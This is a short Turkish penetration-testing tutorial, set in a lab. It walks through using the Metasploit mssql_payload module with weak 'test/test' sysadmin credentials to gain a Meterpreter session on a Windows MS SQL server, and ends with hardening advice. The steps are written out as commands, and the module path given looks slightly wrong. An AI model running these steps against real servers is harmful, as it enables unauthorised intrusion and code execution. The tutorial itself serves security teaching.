Bu yazıda kullanılacak Kali bilgisayarın IP adresi 172.22.71.5, MS SQL veritabanının kurulu olduğu Windows Server 2008 R2 sunucunun IP adresi ise 172.22.71.247 olduğu ve sysadmin rolündeki “test” veritabanı hesabının parolasının “test” olarak tespit edildiğini varsayalım.
Meterpreter komut satırı elde etmek için MSF mssql_payload istismar modülünün genel seçenekleri aşağıdaki gibi listelenebilir.
search mssql_payload
use exploit/scanner/mssql/mssql_payload
show options
MS SQL veritabanında yerel yönetici haklarına sahip olan ve kimlik bilgileri (“test/test”) elde edilen kullanıcı hakları ile MSF mssql_payload istismar modülü aşağıdaki gibi ayarlanabilir ve modül çalıştırılabilir:
set RHOST 172.22.71.247
set USERNAME test
set PASSWORD test
show options
run
Böylece, MSSQLSERVER servisinin yetkileri ile Meterpreter bağlantısının açıldığı görülmektedir.
getuid
background
sessions
Yukarıdaki ekran görüntüsünde de görüldüğü gibi MS SQLSERVER servisini çalıştıran hesabın yetkileri ile Meterpreter bağlantısı elde edilmiştir. Eğer MSSQLSERVER servisi SYSTEM yetkileri ile çalışmış olsaydı, SYSTEM yetkileri elde edilirdi. Bunun yanında “test” hesabı yerine, işletim sisteminde kod çalıştırma yetkisi olan başka bir hesap da kullanılabilirdi. Bu sebeple, gereksiz kullanıcı hesaplarının ve yetkilerinin kaldırılması, mevcut parolaların oldukça karmaşık olması tavsiye edilmektedir.